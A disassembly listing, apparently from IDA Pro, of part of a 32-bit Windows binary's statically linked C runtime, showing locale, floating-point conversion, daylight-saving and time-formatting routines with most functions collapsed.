; [00000077 BYTES: COLLAPSED FUNCTION _wctomb. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000A0 BYTES: COLLAPSED FUNCTION __wctomb_lk. PRESS KEYPAD "+" TO EXPAND]
; [0000007A BYTES: COLLAPSED FUNCTION _mbtowc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000015E BYTES: COLLAPSED FUNCTION __mbtowc_lk. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001F BYTES: COLLAPSED FUNCTION __allshl. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000066 BYTES: COLLAPSED FUNCTION _ungetc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000013E BYTES: COLLAPSED FUNCTION _ungetc_0. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4321B0 proc near ; CODE XREF: __umatherr+5A�p
push ebp
mov ebp, esp
xor eax, eax
pop ebp
retn
sub_4321B0 endp
; ---------------------------------------------------------------------------
align 10h
; [0000001F BYTES: COLLAPSED FUNCTION __statusfp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000020 BYTES: COLLAPSED FUNCTION __clearfp. PRESS KEYPAD "+" TO EXPAND]
; [0000004F BYTES: COLLAPSED FUNCTION __control87. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001A BYTES: COLLAPSED FUNCTION __controlfp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000058 BYTES: COLLAPSED FUNCTION __fpreset. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000179 BYTES: COLLAPSED FUNCTION __abstract_cw. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000015A BYTES: COLLAPSED FUNCTION __hw_cw. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000A7 BYTES: COLLAPSED FUNCTION __abstract_sw. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000084 BYTES: COLLAPSED FUNCTION __ZeroTail. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000A8 BYTES: COLLAPSED FUNCTION __IncMan. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000DB BYTES: COLLAPSED FUNCTION __RoundMan. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000004C BYTES: COLLAPSED FUNCTION __CopyMan. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002F BYTES: COLLAPSED FUNCTION __FillZeroMan. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000037 BYTES: COLLAPSED FUNCTION __IsZeroMan. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000EC BYTES: COLLAPSED FUNCTION __ShrMan. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000242 BYTES: COLLAPSED FUNCTION __ld12cvt. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432C80 proc near ; CODE XREF: sub_432D80+2A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push offset dword_454568
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call __ld12cvt
add esp, 0Ch
pop ebp
retn
sub_432C80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432CA0 proc near ; CODE XREF: sub_432E00+2A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push offset dword_454580
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call __ld12cvt
add esp, 0Ch
pop ebp
retn
sub_432CA0 endp
; ---------------------------------------------------------------------------
align 10h
; [000000BF BYTES: COLLAPSED FUNCTION __ld12told. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432D80 proc near ; CODE XREF: __fassign+14�p
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push 0
push 0
push 0
push 0
mov eax, [ebp+arg_4]
push eax
lea ecx, [ebp+var_10]
push ecx
lea edx, [ebp+var_C]
push edx
call ___strgtold12
add esp, 1Ch
mov eax, [ebp+arg_0]
push eax
lea ecx, [ebp+var_C]
push ecx
call sub_432C80
add esp, 8
mov esp, ebp
pop ebp
retn
sub_432D80 endp
; ---------------------------------------------------------------------------
align 10h
; [00000036 BYTES: COLLAPSED FUNCTION __atoldbl. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432E00 proc near ; CODE XREF: __fassign+34�p
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push 0
push 0
push 0
push 0
mov eax, [ebp+arg_4]
push eax
lea ecx, [ebp+var_10]
push ecx
lea edx, [ebp+var_C]
push edx
call ___strgtold12
add esp, 1Ch
mov eax, [ebp+arg_0]
push eax
lea ecx, [ebp+var_C]
push ecx
call sub_432CA0
add esp, 8
mov esp, ebp
pop ebp
retn
sub_432E00 endp
; ---------------------------------------------------------------------------
align 10h
; [000000FA BYTES: COLLAPSED FUNCTION __fptostr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000077 BYTES: COLLAPSED FUNCTION __fltout2. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000162 BYTES: COLLAPSED FUNCTION ___dtold. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000000F BYTES: COLLAPSED FUNCTION __fptrap. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000005B BYTES: COLLAPSED FUNCTION __CxxUnhandledExceptionFilter(_EXCEPTION_POINTERS *). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000015 BYTES: COLLAPSED FUNCTION __CxxSetUnhandledExceptionFilter(void). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000011 BYTES: COLLAPSED FUNCTION __CxxRestoreUnhandledExceptionFilter(void). PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4331E0 proc near ; CODE XREF: FindHandler(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,void *,_s_FuncInfo const *,uchar,int,EHRegistrationNode *)+9E�p
; BuildCatchObject(EHExceptionRecord *,EHRegistrationNode *,_s_HandlerType const *,_s_CatchableType const *)+77�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], 1
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call ds:dword_4F5470 ; IsBadReadPtr
test eax, eax
jz short loc_433204
mov [ebp+var_4], 0
loc_433204: ; CODE XREF: sub_4331E0+1B�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_4331E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_433210 proc near ; CODE XREF: BuildCatchObject(EHExceptionRecord *,EHRegistrationNode *,_s_HandlerType const *,_s_CatchableType const *)+89�p
; BuildCatchObject(EHExceptionRecord *,EHRegistrationNode *,_s_HandlerType const *,_s_CatchableType const *)+ED�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], 1
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call ds:dword_4F546C ; IsBadWritePtr
test eax, eax
jz short loc_433234
mov [ebp+var_4], 0
loc_433234: ; CODE XREF: sub_433210+1B�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_433210 endp
; ---------------------------------------------------------------------------
align 10h
; [00000027 BYTES: COLLAPSED FUNCTION _ValidateExecute(int (*)(void)). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001E BYTES: COLLAPSED FUNCTION _abort. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
pop ebp
retn
; [0000003D BYTES: COLLAPSED FUNCTION ___tzset. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001E BYTES: COLLAPSED FUNCTION __tzset. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000003AB BYTES: COLLAPSED FUNCTION __tzset_lk. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002E BYTES: COLLAPSED FUNCTION __isindst. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4336D0 proc near ; CODE XREF: __isindst+12�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword_45459C, 0
jnz short loc_4336E4
xor eax, eax
jmp loc_4339C6
; ---------------------------------------------------------------------------
loc_4336E4: ; CODE XREF: sub_4336D0+B�j
mov eax, [ebp+arg_0]
mov ecx, [eax+14h]
cmp ecx, dword_454630
jnz short loc_433704
mov edx, [ebp+arg_0]
mov eax, [edx+14h]
cmp eax, dword_454640
jz loc_4338CB
loc_433704: ; CODE XREF: sub_4336D0+20�j
cmp dword_4F3768, 0
jz loc_433885
xor ecx, ecx
mov cx, word_4F3808
test ecx, ecx
jnz short loc_433779
xor edx, edx
mov dx, word_4F3816
push edx
xor eax, eax
mov ax, word_4F3814
push eax
xor ecx, ecx
mov cx, word_4F3812
push ecx
xor edx, edx
mov dx, word_4F3810
push edx
push 0
xor eax, eax
mov ax, word_4F380C
push eax
xor ecx, ecx
mov cx, word_4F380E
push ecx
xor edx, edx
mov dx, word_4F380A
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax+14h]
push ecx
push 1
push 1
call _cvtdate
add esp, 2Ch
jmp short loc_4337CA
; ---------------------------------------------------------------------------
loc_433779: ; CODE XREF: sub_4336D0+4C�j
xor edx, edx
mov dx, word_4F3816
push edx
xor eax, eax
mov ax, word_4F3814
push eax
xor ecx, ecx
mov cx, word_4F3812
push ecx
xor edx, edx
mov dx, word_4F3810
push edx
xor eax, eax
mov ax, word_4F380E
push eax
push 0
push 0
xor ecx, ecx
mov cx, word_4F380A
push ecx
mov edx, [ebp+arg_0]
mov eax, [edx+14h]
push eax
push 0
push 1
call _cvtdate
add esp, 2Ch
loc_4337CA: ; CODE XREF: sub_4336D0+A7�j
xor ecx, ecx
mov cx, word_4F37B4
test ecx, ecx
jnz short loc_433832
xor edx, edx
mov dx, word_4F37C2
push edx
xor eax, eax
mov ax, word_4F37C0
push eax
xor ecx, ecx
mov cx, word_4F37BE
push ecx
xor edx, edx
mov dx, word_4F37BC
push edx
push 0
xor eax, eax
mov ax, word_4F37B8
push eax
xor ecx, ecx
mov cx, word_4F37BA
push ecx
xor edx, edx
mov dx, word_4F37B6
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax+14h]
push ecx
push 1
push 0
call _cvtdate
add esp, 2Ch
jmp short loc_433883
; ---------------------------------------------------------------------------
loc_433832: ; CODE XREF: sub_4336D0+105�j
xor edx, edx
mov dx, word_4F37C2
push edx
xor eax, eax
mov ax, word_4F37C0
push eax
xor ecx, ecx
mov cx, word_4F37BE
push ecx
xor edx, edx
mov dx, word_4F37BC
push edx
xor eax, eax
mov ax, word_4F37BA
push eax
push 0
push 0
xor ecx, ecx
mov cx, word_4F37B6
push ecx
mov edx, [ebp+arg_0]
mov eax, [edx+14h]
push eax
push 0
push 0
call _cvtdate
add esp, 2Ch
loc_433883: ; CODE XREF: sub_4336D0+160�j
jmp short loc_4338CB
; ---------------------------------------------------------------------------
loc_433885: ; CODE XREF: sub_4336D0+3B�j
push 0
push 0
push 0
push 2
push 0
push 0
push 1
push 4
mov ecx, [ebp+arg_0]
mov edx, [ecx+14h]
push edx
push 1
push 1
call _cvtdate
add esp, 2Ch
push 0
push 0
push 0
push 2
push 0
push 0
push 5
push 0Ah
mov eax, [ebp+arg_0]
mov ecx, [eax+14h]
push ecx
push 1
push 0
call _cvtdate
add esp, 2Ch
loc_4338CB: ; CODE XREF: sub_4336D0+2E�j
; sub_4336D0:loc_433883�j
mov edx, dword_454634
cmp edx, dword_454644
jge short loc_433924
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
cmp ecx, dword_454634
jl short loc_4338F5
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
cmp eax, dword_454644
jle short loc_4338FC
loc_4338F5: ; CODE XREF: sub_4336D0+215�j
xor eax, eax
jmp loc_4339C6
; ---------------------------------------------------------------------------
loc_4338FC: ; CODE XREF: sub_4336D0+223�j
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
cmp edx, dword_454634
jle short loc_433922
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
cmp ecx, dword_454644
jge short loc_433922
mov eax, 1
jmp loc_4339C6
; ---------------------------------------------------------------------------
loc_433922: ; CODE XREF: sub_4336D0+238�j
; sub_4336D0+246�j
jmp short loc_433967
; ---------------------------------------------------------------------------
loc_433924: ; CODE XREF: sub_4336D0+207�j
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
cmp eax, dword_454644
jl short loc_433940
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
cmp edx, dword_454634
jle short loc_433947
loc_433940: ; CODE XREF: sub_4336D0+260�j
mov eax, 1
jmp short loc_4339C6
; ---------------------------------------------------------------------------
loc_433947: ; CODE XREF: sub_4336D0+26E�j
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
cmp ecx, dword_454644
jle short loc_433967
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
cmp eax, dword_454634
jge short loc_433967
xor eax, eax
jmp short loc_4339C6
; ---------------------------------------------------------------------------
loc_433967: ; CODE XREF: sub_4336D0:loc_433922�j
; sub_4336D0+283�j ...
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
imul edx, 3Ch
mov eax, [ebp+arg_0]
mov ecx, [eax]
add ecx, edx
mov edx, [ebp+arg_0]
mov eax, [edx+8]
imul eax, 0E10h
add ecx, eax
imul ecx, 3E8h
mov [ebp+var_4], ecx
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
cmp edx, dword_454634
jnz short loc_4339B2
mov eax, [ebp+var_4]
cmp eax, dword_454638
jl short loc_4339AE
mov eax, 1
jmp short loc_4339C6
; ---------------------------------------------------------------------------
loc_4339AE: ; CODE XREF: sub_4336D0+2D5�j
xor eax, eax
jmp short loc_4339C6
; ---------------------------------------------------------------------------
loc_4339B2: ; CODE XREF: sub_4336D0+2CA�j
mov ecx, [ebp+var_4]
cmp ecx, dword_454648
jge short loc_4339C4
mov eax, 1
jmp short loc_4339C6
; ---------------------------------------------------------------------------
loc_4339C4: ; CODE XREF: sub_4336D0+2EB�j
xor eax, eax
loc_4339C6: ; CODE XREF: sub_4336D0+F�j
; sub_4336D0+227�j ...
mov esp, ebp
pop ebp
retn
sub_4336D0 endp
; ---------------------------------------------------------------------------
align 10h
; [000001F8 BYTES: COLLAPSED FUNCTION _cvtdate. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000DB BYTES: COLLAPSED FUNCTION ___init_time. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000058F BYTES: COLLAPSED FUNCTION __get_lc_time. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000030B BYTES: COLLAPSED FUNCTION __free_lc_time. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000002A6 BYTES: COLLAPSED FUNCTION ___init_numeric. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000007D BYTES: COLLAPSED FUNCTION _fix_grouping. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000130 BYTES: COLLAPSED FUNCTION ___init_monetary. PRESS KEYPAD "+" TO EXPAND]
; [0000020D BYTES: COLLAPSED FUNCTION __get_lc_lconv. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000007D BYTES: COLLAPSED FUNCTION _fix_grouping_0. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000093 BYTES: COLLAPSED FUNCTION __free_lc_lconv. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000003A0 BYTES: COLLAPSED FUNCTION unknown_libname_28. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_435080 proc near ; DATA XREF: .data:004543E4�o
push ebp
mov ebp, esp
xor eax, eax
pop ebp
retn
sub_435080 endp
; ---------------------------------------------------------------------------
align 10h
; [0000003E BYTES: COLLAPSED FUNCTION _strcspn. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003A BYTES: COLLAPSED FUNCTION unknown_libname_30. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000200 BYTES: COLLAPSED FUNCTION ___get_qualified_locale. PRESS KEYPAD "+" TO EXPAND]
; [00000082 BYTES: COLLAPSED FUNCTION _TranslateName. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000BA BYTES: COLLAPSED FUNCTION _GetLcidFromLangCountry. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000324 BYTES: COLLAPSED FUNCTION LangCountryEnumProc(x). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000074 BYTES: COLLAPSED FUNCTION _GetLcidFromLanguage. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000011F BYTES: COLLAPSED FUNCTION LanguageEnumProc(x). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000045 BYTES: COLLAPSED FUNCTION _GetLcidFromCountry. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000AC BYTES: COLLAPSED FUNCTION CountryEnumProc(x). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002B BYTES: COLLAPSED FUNCTION _GetLcidFromDefault. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000009B BYTES: COLLAPSED FUNCTION _ProcessCodePage. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000004F BYTES: COLLAPSED FUNCTION _TestDefaultCountry. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000087 BYTES: COLLAPSED FUNCTION _TestDefaultLanguage. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000004D BYTES: COLLAPSED FUNCTION _IsThisWindowsNT. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000184 BYTES: COLLAPSED FUNCTION crtGetLocaleInfoA(x,x,x,x). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000076 BYTES: COLLAPSED FUNCTION _LcidFromHexString. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000065 BYTES: COLLAPSED FUNCTION _GetPrimaryLen. PRESS KEYPAD "+" TO EXPAND]
align 10h
push ebp
mov ebp, esp
push 1
push 0
mov eax, [ebp+8]
push eax
call sub_436030
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [00000015 BYTES: COLLAPSED FUNCTION __ismbbkprint. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000015 BYTES: COLLAPSED FUNCTION __ismbbkpunct. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000018 BYTES: COLLAPSED FUNCTION __ismbbalnum. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000018 BYTES: COLLAPSED FUNCTION __ismbbalpha. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000018 BYTES: COLLAPSED FUNCTION __ismbbgraph. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000018 BYTES: COLLAPSED FUNCTION __ismbbprint. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000015 BYTES: COLLAPSED FUNCTION __ismbbpunct. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000015 BYTES: COLLAPSED FUNCTION __ismbblead. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000015 BYTES: COLLAPSED FUNCTION __ismbbtrail. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003B BYTES: COLLAPSED FUNCTION __ismbbkana. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_436030 proc near ; CODE XREF: .text:00435EBB�p
; __ismbbkprint+B�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
mov eax, [ebp+arg_0]
and eax, 0FFh
mov [ebp+arg_0], eax
mov ecx, [ebp+arg_0]
xor edx, edx
mov dl, byte_4F3AE1[ecx]
and edx, [ebp+arg_8]
test edx, edx
jnz short loc_436084
cmp [ebp+arg_4], 0
jz short loc_43606E
mov eax, [ebp+arg_0]
xor ecx, ecx
mov cx, word ptr (__wctype+2)[eax*2]
and ecx, [ebp+arg_4]
mov [ebp+var_4], ecx
jmp short loc_436075
; ---------------------------------------------------------------------------
loc_43606E: ; CODE XREF: sub_436030+27�j
mov [ebp+var_4], 0
loc_436075: ; CODE XREF: sub_436030+3C�j
cmp [ebp+var_4], 0
jnz short loc_436084
mov [ebp+var_8], 0
jmp short loc_43608B
; ---------------------------------------------------------------------------
loc_436084: ; CODE XREF: sub_436030+21�j
; sub_436030+49�j
mov [ebp+var_8], 1
loc_43608B: ; CODE XREF: sub_436030+52�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_436030 endp
; ---------------------------------------------------------------------------
align 10h
; [00000073 BYTES: COLLAPSED FUNCTION __chsize. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000230 BYTES: COLLAPSED FUNCTION __chsize_lk. PRESS KEYPAD "+" TO EXPAND]
; [0000003E BYTES: COLLAPSED FUNCTION ___addl. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000AD BYTES: COLLAPSED FUNCTION ___add_12. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000060 BYTES: COLLAPSED FUNCTION ___shl_12. PRESS KEYPAD "+" TO EXPAND]
; [00000063 BYTES: COLLAPSED FUNCTION ___shr_12. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000013B BYTES: COLLAPSED FUNCTION ___mtold12. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000A1A BYTES: COLLAPSED FUNCTION ___strgtold12. PRESS KEYPAD "+" TO EXPAND]
off_43706A dd offset loc_43672C ; DATA XREF: ___strgtold12+D5�r
dd offset loc_4367CA
dd offset loc_436880
dd offset loc_4368EB
dd offset loc_436A03
dd offset loc_436B35
dd offset loc_436BAB
dd offset loc_436C90
dd offset loc_436C32
dd offset loc_436CE3
dd offset loc_436E53
dd offset loc_436DEF
off_43709A dd offset loc_436859 ; DATA XREF: ___strgtold12+1F0�r
dd offset loc_436847
dd offset loc_436850
dd offset loc_43686B
byte_4370AA db 0 ; DATA XREF: ___strgtold12+1EA�r
db 3
dd 1030300h, 4 dup(3030303h), 2030303h, 3030302h, 6 dup(3030303h)
dd 2030303h
db 2
dd offset loc_4369DC ; DATA XREF: ___strgtold12+37C�r
dd offset loc_4369D3
dd offset loc_4369EE
byte_4370F1 db 0 ; DATA XREF: ___strgtold12+376�r
dw 2
dd 5 dup(2020202h), 1010202h, 7 dup(2020202h), 1010202h
off_43712C dd offset loc_436B0E ; DATA XREF: ___strgtold12+4AE�r
dd offset loc_436B05
dd offset loc_436B20
byte_437138 db 0 ; DATA XREF: ___strgtold12+4A8�r
db 2, 0, 2
dd 5 dup(2020202h), 2010102h, 7 dup(2020202h), 0CC010102h
dd 3 dup(0CCCCCCCCh)
; [0000004F BYTES: COLLAPSED FUNCTION ___STRINGTOLD. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000516 BYTES: COLLAPSED FUNCTION _$I10_OUTPUT. PRESS KEYPAD "+" TO EXPAND]
align 10h
push ebp
mov ebp, esp
push ecx
push 0Ch
call __lock
add esp, 4
mov eax, [ebp+8]
push eax
call _getenv
add esp, 4
mov [ebp-4], eax
push 0Ch
call __unlock
add esp, 4
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [000000C6 BYTES: COLLAPSED FUNCTION _getenv. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000121 BYTES: COLLAPSED FUNCTION __Getdays. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000123 BYTES: COLLAPSED FUNCTION __Getmonths. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000036E BYTES: COLLAPSED FUNCTION __Gettnames. PRESS KEYPAD "+" TO EXPAND]
align 10h
push ebp
mov ebp, esp
push 0
mov eax, [ebp+14h]
push eax
mov ecx, [ebp+10h]
push ecx
mov edx, [ebp+0Ch]
push edx
mov eax, [ebp+8]
push eax
call sub_437DE0
add esp, 14h
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_437DE0 proc near ; CODE XREF: .text:00437DD5�p
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_4]
mov [ebp+var_C], eax
push offset dword_4F39C8
call ds:dword_4F5488 ; InterlockedIncrement
cmp dword_4F39C4, 0
jz short loc_437E1E
push offset dword_4F39C8
call ds:dword_4F5484 ; InterlockedDecrement
push 13h
call __lock
add esp, 4
mov [ebp+var_8], 1
jmp short loc_437E25
; ---------------------------------------------------------------------------
loc_437E1E: ; CODE XREF: sub_437DE0+1E�j
mov [ebp+var_8], 0
loc_437E25: ; CODE XREF: sub_437DE0+3C�j
cmp [ebp+arg_10], 0
jnz short loc_437E36
mov ecx, off_454E38
mov [ebp+var_10], ecx
jmp short loc_437E3C
; ---------------------------------------------------------------------------
loc_437E36: ; CODE XREF: sub_437DE0+49�j
mov edx, [ebp+arg_10]
mov [ebp+var_10], edx
loc_437E3C: ; CODE XREF: sub_437DE0+54�j
mov eax, [ebp+var_10]
mov [ebp+var_4], eax
loc_437E42: ; CODE XREF: sub_437DE0:loc_437F2E�j
cmp [ebp+var_C], 0
jbe loc_437F33
mov ecx, [ebp+arg_8]
mov dl, [ecx]
mov [ebp+var_14], dl
cmp [ebp+var_14], 0
jz short loc_437E62
cmp [ebp+var_14], 25h
jz short loc_437E67
jmp short loc_437EC1
; ---------------------------------------------------------------------------
loc_437E62: ; CODE XREF: sub_437DE0+78�j
jmp loc_437F33
; ---------------------------------------------------------------------------
loc_437E67: ; CODE XREF: sub_437DE0+7E�j
mov eax, [ebp+arg_8]
add eax, 1
mov [ebp+arg_8], eax
mov dword_4F38B0, 0
mov ecx, [ebp+arg_8]
movsx edx, byte ptr [ecx]
cmp edx, 23h
jnz short loc_437E98
mov dword_4F38B0, 1
mov eax, [ebp+arg_8]
add eax, 1
mov [ebp+arg_8], eax
loc_437E98: ; CODE XREF: sub_437DE0+A3�j
mov ecx, [ebp+var_4]
push ecx
lea edx, [ebp+var_C]
push edx
lea eax, [ebp+arg_0]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
mov al, [edx]
push eax
call sub_437F70
add esp, 14h
mov ecx, [ebp+arg_8]
add ecx, 1
mov [ebp+arg_8], ecx
jmp short loc_437F2E
; ---------------------------------------------------------------------------
loc_437EC1: ; CODE XREF: sub_437DE0+80�j
mov edx, [ebp+arg_8]
xor eax, eax
mov al, [edx]
mov ecx, off_453CF4
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 8000h
test edx, edx
jz short loc_437F09
cmp [ebp+var_C], 1
jbe short loc_437F09
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_8]
mov dl, [ecx]
mov [eax], dl
mov eax, [ebp+arg_0]
add eax, 1
mov [ebp+arg_0], eax
mov ecx, [ebp+arg_8]
add ecx, 1
mov [ebp+arg_8], ecx
mov edx, [ebp+var_C]
sub edx, 1
mov [ebp+var_C], edx
loc_437F09: ; CODE XREF: sub_437DE0+FC�j
; sub_437DE0+102�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_8]
mov dl, [ecx]
mov [eax], dl
mov eax, [ebp+arg_0]
add eax, 1
mov [ebp+arg_0], eax
mov ecx, [ebp+arg_8]
add ecx, 1
mov [ebp+arg_8], ecx
mov edx, [ebp+var_C]
sub edx, 1
mov [ebp+var_C], edx
loc_437F2E: ; CODE XREF: sub_437DE0+DF�j
jmp loc_437E42
; ---------------------------------------------------------------------------
loc_437F33: ; CODE XREF: sub_437DE0+66�j
; sub_437DE0:loc_437E62�j
cmp [ebp+var_8], 0
jz short loc_437F45
push 13h
call __unlock
add esp, 4
jmp short loc_437F50
; ---------------------------------------------------------------------------
loc_437F45: ; CODE XREF: sub_437DE0+157�j
push offset dword_4F39C8
call ds:dword_4F5484 ; InterlockedDecrement
loc_437F50: ; CODE XREF: sub_437DE0+163�j
cmp [ebp+var_C], 0
jbe short loc_437F64
mov eax, [ebp+arg_0]
mov byte ptr [eax], 0
mov eax, [ebp+arg_4]
sub eax, [ebp+var_C]
jmp short loc_437F66
; ---------------------------------------------------------------------------
loc_437F64: ; CODE XREF: sub_437DE0+174�j
xor eax, eax
loc_437F66: ; CODE XREF: sub_437DE0+182�j
mov esp, ebp
pop ebp
retn
sub_437DE0 endp
; ---------------------------------------------------------------------------
align 10h
